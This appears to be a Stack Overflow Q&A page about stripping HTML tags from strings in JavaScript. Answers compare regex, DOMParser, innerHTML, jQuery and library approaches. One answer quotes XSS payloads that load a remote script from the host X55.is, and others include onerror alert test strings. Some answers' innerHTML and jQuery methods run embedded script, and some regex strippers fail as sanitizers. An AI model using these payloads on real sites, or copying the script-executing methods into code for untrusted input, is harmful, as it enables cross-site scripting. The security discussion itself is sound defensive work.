Reputation: 17581
How can I strip HTML tags from a string using plain JavaScript only, without a library?
Upvotes: 868
Views: 939863
Reputation: 2402
This should work in any JavaScript environment (Node.js included).
const text = `
<html lang="en">
<head>
<style type="text/css">*{color:red}</style>
<script>alert('hello')</script>
</head>
<body><b>This is some text</b><br/></body>
</html>`;
// Remove style tags and content (lazy match that also spans newlines)
const stripped = text.replace(/<style[^>]*>[\s\S]*?<\/style>/g, '')
  // Remove script tags and content
  .replace(/<script[^>]*>[\s\S]*?<\/script>/g, '')
  // Remove all opening, closing and orphan HTML tags
  .replace(/<[^>]+>/g, '')
  // Remove leading spaces and repeated CR/LF
  .replace(/([\r\n]+ +)+/g, '');
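The chain above can be wrapped in a reusable function. This is only a minimal sketch: the name `stripTagsAndBlocks` is hypothetical, the lazy `[\s\S]*?` is used so that style and script blocks spanning several lines are removed, and the final whitespace collapse is an added assumption. Regex stripping like this is a convenience, not a sanitizer.

```javascript
// Hypothetical helper: regex-based stripping for environments without a DOM.
function stripTagsAndBlocks(html) {
  return String(html)
    // Drop <style> and <script> elements together with their content.
    .replace(/<style\b[^>]*>[\s\S]*?<\/style\s*>/gi, '')
    .replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '')
    // Drop every remaining tag.
    .replace(/<[^>]+>/g, '')
    // Collapse whitespace left behind by the removed markup (assumption).
    .replace(/\s+/g, ' ')
    .trim();
}

const sample =
  '<head>\n<style>\n* { color: red }\n</style>\n' +
  '<script>alert("hi")</script>\n</head>\n' +
  '<body><b>This is some text</b><br/></body>';

console.log(stripTagsAndBlocks(sample)); // This is some text
```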
Upvotes: 37
Reputation: 175
To add to the DOMParser solution: our team found that it was still possible to inject a malicious script using the basic solution, for example with payloads like these:
\"><script>document.write('<img src=//X55.is onload=import(src)>');</script>'
\"><script>document.write('\"><script>document.write('\"><img src=//X55.is onload=import(src)>');</script>');</script>
We found that it was best to parse it recursively if any tags still exist after the initial parse.
function stripHTML(str) {
const parsedHTML = new DOMParser().parseFromString(str, "text/html");
const text = parsedHTML.body.textContent;
if (/(<([^>]+)>)/gi.test(text)) {
return stripHTML(text);
}
return text || "";
}
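The same idea can be written as a loop with a pass limit, which avoids unbounded recursion on adversarial input. A minimal sketch, under stated assumptions: `stripUntilStable` and `maxPasses` are hypothetical names, and the text extractor is passed in as a parameter so that in a browser it can be the DOMParser call shown above. The stand-in extractor below (regex strip plus decoding of `&lt;` and `&gt;`) exists only so the example runs outside a browser.

```javascript
// Hypothetical helper: re-run a text extractor until no tag-like text remains,
// or until maxPasses is reached.
function stripUntilStable(str, extractText, maxPasses = 10) {
  const tagLike = /<[^>]+>/; // no "g" flag, so test() keeps no state
  let text = String(str);
  for (let pass = 0; pass < maxPasses && tagLike.test(text); pass++) {
    text = extractText(text) || '';
  }
  return text;
}

// In a browser the extractor could be:
//   (s) => new DOMParser().parseFromString(s, 'text/html').body.textContent
// Stand-in for demonstration only: strips tags, then decodes &lt; and &gt;
// the way textContent would, which is what re-exposes nested markup.
const standInExtract = (s) =>
  s.replace(/<[^>]+>/g, '').replace(/&lt;/g, '<').replace(/&gt;/g, '>');

const nested = '<p>&lt;b&gt;hello&lt;/b&gt;</p>';
console.log(standInExtract(nested));                   // <b>hello</b>
console.log(stripUntilStable(nested, standInExtract)); // hello
```

If the pass limit is hit, tag-like text can still be present in the result, so the caller may want to treat that case as a rejection rather than as clean output.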
Upvotes: 3
Reputation: 1252
Additionally, if you want to strip the HTML from a string and preserve the line breaks, you can use this:
function stripHTML(string) {
  // Parse into an inert document, then collect the text of each top-level node
  let doc = new DOMParser().parseFromString(string, 'text/html');
  let textLines = [];
  doc.body.childNodes.forEach((childNode) => {
    textLines.push(childNode.textContent || '');
  });
  // Join the pieces with <br> so the line breaks survive
  let result = textLines.join('<br>');
  return result;
}
Upvotes: 0
Reputation: 5262
I would like to share an edited version of Shog9's accepted answer.
As Mike Samuel pointed out in a comment, that function can execute inline JavaScript code.
But Shog9 is right when saying "let the browser do it for you..."
So here is my edited version, using DOMParser:
function strip(html){
let doc = new DOMParser().parseFromString(html, 'text/html');
return doc.body.textContent || "";
}
Here is the code to test the inline JavaScript:
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
Also, it does not request resources (like images) on parse:
strip("Just text <img src='https://assets.rbl.ms/4155638/980x.jpg'>")
Upvotes: 321
Reputation: 32472
A very good library is sanitize-html, which is pure JavaScript and works in any environment.
My case was in React Native, where I needed to remove all HTML tags from the given texts, so I created this wrapper function:
import sanitizer from 'sanitize-html';
const textSanitizer = (textWithHTML: string): string =>
sanitizer(textWithHTML, {
allowedTags: [],
});
export default textSanitizer;
Now, by using my textSanitizer, I can get the pure text contents.
Upvotes: 4
Reputation: 113
You can strip out all the html tags with the following regex: /<(.|\n)*?>/g
Example:
let str = "<font class=\"ClsName\">int[0]</font><font class=\"StrLit\">()</font>";
console.log(str.replace(/<(.|\n)*?>/g, ''));
Output:
int[0]()
Upvotes: 0
Reputation: 441
const htmlParser= new DOMParser().parseFromString("<h6>User<p>name</p></h6>" , 'text/html');
const textString= htmlParser.body.textContent;
console.log(textString)
Upvotes: 9
Reputation: 49182
const strip=(text) =>{
return (new DOMParser()?.parseFromString(text,"text/html"))
?.body?.textContent
}
const value=document.getElementById("idOfEl").value
const cleanText=strip(value)
Upvotes: 2
Reputation: 965
As others suggested, I recommend using DOMParser when possible.
However, if you happen to be working inside a Node/JS Lambda, or DOMParser is otherwise not available, I came up with the regex below to match most of the scenarios mentioned in previous answers/comments. It doesn't match &gt; and &lt;, which some others may be concerned about, but it should capture pretty much any other scenario.
const dangerousText = '?';
const htmlTagRegex = /<\/?([a-zA-Z]\s?)*?([a-zA-Z]+?=\s?".*")*?([\s/]*?)>/gi;
const sanitizedText = dangerousText.replace(htmlTagRegex, '');
This might be easy to simplify, but it should work for most situations. Hope it helps someone.
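One way to combine the two recommendations is to feature-detect DOMParser and fall back to a regex only where it is missing. A rough sketch: the function name `stripHtml` and the simple fallback pattern `/<[^>]+>/g` are illustrative assumptions (not the regex from this answer), and the fallback does not decode entities.

```javascript
// Hypothetical wrapper: prefer DOMParser, fall back to a plain regex.
function stripHtml(html) {
  const input = String(html);
  if (typeof DOMParser !== 'undefined') {
    // Browser path: parse into an inert document and read its text.
    const doc = new DOMParser().parseFromString(input, 'text/html');
    return doc.body.textContent || '';
  }
  // Non-browser path (assumption): remove anything that looks like a tag.
  return input.replace(/<[^>]+>/g, '');
}

console.log(stripHtml('<p>Hello <b>world</b></p>')); // Hello world
```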
Upvotes: 1
Reputation: 768
const getTextFromHtml = (t) =>
t
?.split('>')
?.map((i) => i.split('<')[0])
.filter((i) => !i.includes('=') && i.trim())
.join('');
const test = '<p>This <strong>one</strong> <em>time</em>,</p><br /><blockquote>I went to</blockquote><ul><li>band <a href="https://workingclasshistory.com" rel="noopener noreferrer" target="_blank">camp</a>…</li></ul><p>I edited this as a reviewer just to double check</p>'
getTextFromHtml(test)
// 'This onetime,I went toband camp…I edited this as a reviewer just to double check'
Upvotes: 1
Reputation: 44700
It is also possible to use the fantastic htmlparser2 pure JS HTML parser. Here is a working demo:
var htmlparser = require('htmlparser2');
var body = '<p><div>This is </div>a <span>simple </span> <img src="test"></img>example.</p>';
var result = [];
var parser = new htmlparser.Parser({
ontext: function(text){
result.push(text);
}
}, {decodeEntities: true});
parser.write(body);
parser.end();
result.join('');
The output will be This is a simple example.
See it in action here: https://tonicdev.com/jfahrenkrug/extract-text-from-html
This works in both node and the browser if you pack your web application using a tool like webpack.
Upvotes: 6
Reputation: 57482
This package works really well for stripping HTML: https://www.npmjs.com/package/string-strip-html
It works in both the browser and on the server (e.g. Node.js).
Upvotes: 0
Reputation: 1769
If you don't want to create a DOM for this (perhaps you're not in a browser context) you could use the striptags npm package.
import striptags from 'striptags'; //ES6 <-- pick one
const striptags = require('striptags'); //ES5 <-- pick one
striptags('<p>An HTML string</p>');
Upvotes: 2
Reputation: 11
var STR='<Your HTML STRING>';
var HTMLParsedText="";
var resultSet = STR.split('>')
var resultSetLength =resultSet.length
var counter=0
while(resultSetLength>0)
{
if(resultSet[counter].indexOf('<')>0)
{
var value = resultSet[counter];
value=value.substring(0, resultSet[counter].indexOf('<'))
if (resultSet[counter].indexOf('&')>=0 && resultSet[counter].indexOf(';')>=0) {
value=value.replace(value.substring(resultSet[counter].indexOf('&'), resultSet[counter].indexOf(';')+1),'')
}
}
if (value)
{
value = value.trim();
if(HTMLParsedText === "")
{
HTMLParsedText = value;
}
else
{
if (value) {
HTMLParsedText = HTMLParsedText + "\n" + value;
}
}
value='';
}
counter= counter+1;
resultSetLength=resultSetLength-1;
}
console.log(HTMLParsedText);
Upvotes: 0
Reputation: 4518
From CSS-Tricks:
https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/
const originalString = `
<div>
<p>Hey that's <span>somthing</span></p>
</div>
`;
const strippedString = originalString.replace(/(<([^>]+)>)/gi, "");
console.log(strippedString);
Upvotes: 16
Reputation: 1013
As an extension to the jQuery method: if your string might not contain HTML (e.g. if you are trying to remove HTML from a form field),
jQuery(html).text();
will return an empty string if there is no HTML. Use:
jQuery('<p>' + html + '</p>').text();
instead.
Update:
As has been pointed out in the comments, in some circumstances this solution will execute JavaScript contained within html. If the value of html could be influenced by an attacker, use a different solution.
Upvotes: 61
Reputation: 159590
If you're running in a browser, then the easiest way is just to let the browser do it for you...
function stripHtml(html)
{
let tmp = document.createElement("DIV");
tmp.innerHTML = html;
return tmp.textContent || tmp.innerText || "";
}
Note: as folks have noted in the comments, this is best avoided if you don't control the source of the HTML (for example, don't run this on anything that could've come from user input). For those scenarios, you can still let the browser do the work for you - see Saba's answer on using the now widely-available DOMParser.
Upvotes: 916
Reputation: 840
For an easier solution, try this: https://css-tricks.com/snippets/javascript/strip-html-tags-in-javascript/
var StrippedString = OriginalString.replace(/(<([^>]+)>)/ig,"");
Upvotes: 6
Reputation: 853
method 1:
function cleanHTML(str){
  return str.replace(/<(?<=<)(.*?)(?=>)>/g, '&lt;$1&gt;');
}
function uncleanHTML(str){
  return str.replace(/&lt;(?<=&lt;)(.*?)(?=&gt;)&gt;/g, '<$1>');
}
method 2:
function cleanHTML(str){
  return str.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function uncleanHTML(str){
  return str.replace(/&lt;/g, '<').replace(/&gt;/g, '>');
}
Also, don't forget that if the user happens to post a math comment (e.g. 1 < 2), you don't want to strip the whole comment. The browser (only tested in Chrome) doesn't run escaped entities as HTML tags: if you replace every < with &lt; everywhere in the string, the entity will display < as text without running any HTML. I recommend method 2. jQuery also works well: $('#element').text();
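Escaping rather than stripping, as recommended in method 2, can be sketched as follows. The helper names `escapeHtml` and `unescapeHtml` are hypothetical, and escaping `&` as well is an added assumption (it is not part of the answer) so that the round trip is lossless.

```javascript
// Hypothetical helpers: escape markup so it displays as text, and reverse it.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;') // must run first so later entities are not re-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

function unescapeHtml(str) {
  return String(str)
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&'); // must run last so "&amp;lt;" becomes "&lt;"
}

const comment = '1 < 2 && <b>bold</b>';
const escaped = escapeHtml(comment);

console.log(escaped); // 1 &lt; 2 &amp;&amp; &lt;b&gt;bold&lt;/b&gt;
console.log(unescapeHtml(escaped) === comment); // true
```

The math comment survives intact, and the `<b>` tag is shown as literal text instead of being interpreted.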
Upvotes: 0
Reputation: 8721
A safer way to strip the html with jQuery is to first use jQuery.parseHTML to create a DOM, ignoring any scripts, before letting jQuery build an element and then retrieving only the text.
function stripHtml(unsafe) {
return $($.parseHTML(unsafe)).text();
}
Can safely strip html from:
<img src="unknown.gif" onerror="console.log('running injections');">
And other exploits.
nJoy!
Upvotes: 2
Reputation: 1478
https://developer.mozilla.org/en-US/docs/Web/API/Element/insertAdjacentHTML
var div = document.getElementsByTagName('div');
for (var i=0; i<div.length; i++) {
div[i].insertAdjacentHTML('afterend', div[i].innerHTML);
document.body.removeChild(div[i]);
}
Upvotes: 0
Reputation: 1843
An improvement to the accepted answer.
function strip(html)
{
var tmp = document.implementation.createHTMLDocument("New").body;
tmp.innerHTML = html;
return tmp.textContent || tmp.innerText || "";
}
This way something running like this will do no harm:
strip("<img onerror='alert(\"could run arbitrary JS here\")' src=bogus>")
Firefox, Chromium and Internet Explorer 9+ are safe. Opera Presto is still vulnerable. Also, images mentioned in the strings are not downloaded in Chromium and Firefox, saving HTTP requests.
Upvotes: 37
Reputation: 6764
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
This is a regex version, which is more resilient to malformed HTML, like:
Unclosed tags
Some text <img
"<", ">" inside tag attributes
Some text <img alt="x > y">
Newlines
Some <a
href="http://google.com">
The code
var html = '<br>This <img alt="a>b" \r\n src="a_b.gif" />is > \nmy<>< > <a>"text"</a'
var text = html.replace(/<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g, "");
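The malformed cases listed above can be checked directly. A small sketch that reuses the regex unchanged; the names `TAG_RE` and `stripTags` are hypothetical, and `JSON.stringify` is used only to make trailing spaces visible in the output.

```javascript
// The regex from this answer, wrapped in a hypothetical helper.
const TAG_RE = /<\/?("[^"]*"|'[^']*'|[^>])*(>|$)/g;
const stripTags = (html) => html.replace(TAG_RE, '');

// Unclosed tag: everything from "<" to the end of input is removed.
console.log(JSON.stringify(stripTags('Some text <img')));              // "Some text "

// ">" inside a quoted attribute does not end the tag early.
console.log(JSON.stringify(stripTags('Some text <img alt="x > y">'))); // "Some text "

// A newline inside the tag is handled as well.
console.log(JSON.stringify(stripTags('Some <a\nhref="http://google.com">link</a>'))); // "Some link"
```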
Upvotes: 22
Reputation: 672
function strip_html_tags(str)
{
if ((str===null) || (str===''))
return false;
else
str = str.toString();
return str.replace(/<[^>]*>/g, '');
}
Upvotes: -1
Reputation: 170
The input element supports only single-line text:
The text state represents a one line plain text edit control for the element's value.
function stripHtml(str) {
var tmp = document.createElement('input');
tmp.value = str;
return tmp.value;
}
Update: this works as expected
function stripHtml(str) {
// Remove some tags
str = str.replace(/<[^>]+>/gim, '');
// Remove BB code
str = str.replace(/\[(\w+)[^\]]*](.*?)\[\/\1]/g, '$2 ');
// Remove html and line breaks
const div = document.createElement('div');
div.innerHTML = str;
const input = document.createElement('input');
input.value = div.textContent || div.innerText || '';
return input.value;
}
Upvotes: 1
Reputation: 1423
A lot of people have answered this already, but I thought it might be useful to share the function I wrote that strips HTML tags from a string but allows you to include an array of tags that you do not want stripped. It's pretty short and has been working nicely for me.
function removeTags(string, array){
return array ? string.split("<").filter(function(val){ return f(array, val); }).map(function(val){ return f(array, val); }).join("") : string.split("<").map(function(d){ return d.split(">").pop(); }).join("");
function f(array, value){
return array.map(function(d){ return value.includes(d + ">"); }).indexOf(true) != -1 ? "<" + value : value.split(">")[1];
}
}
var x = "<span><i>Hello</i> <b>world</b>!</span>";
console.log(removeTags(x)); // Hello world!
console.log(removeTags(x, ["span", "i"])); // <span><i>Hello</i> world!</span>
Upvotes: 5
Reputation: 4500
Using jQuery:
function stripTags(textToEscape) {
  return $('<p></p>').html(textToEscape).text();
}
Upvotes: 1
Reputation: 1356
This pattern also handles escaped characters:
myString.replace(/((&lt;)|(<)(?:.|\n)*?(&gt;)|(>))/gm, '');
Upvotes: 0
Reputation: 867
If you want to keep the links and the structure of the content (h1, h2, etc.), then you should check out TextVersionJS. You can use it with any HTML, although it was created to convert an HTML email to plain text.
The usage is very simple. For example in node.js:
var createTextVersion = require("textversionjs");
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
Or in the browser with pure js:
<script src="textversion.js"></script>
<script>
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
</script>
It also works with require.js:
define(["textversionjs"], function(createTextVersion) {
var yourHtml = "<h1>Your HTML</h1><ul><li>goes</li><li>here.</li></ul>";
var textVersion = createTextVersion(yourHtml);
});
Upvotes: 7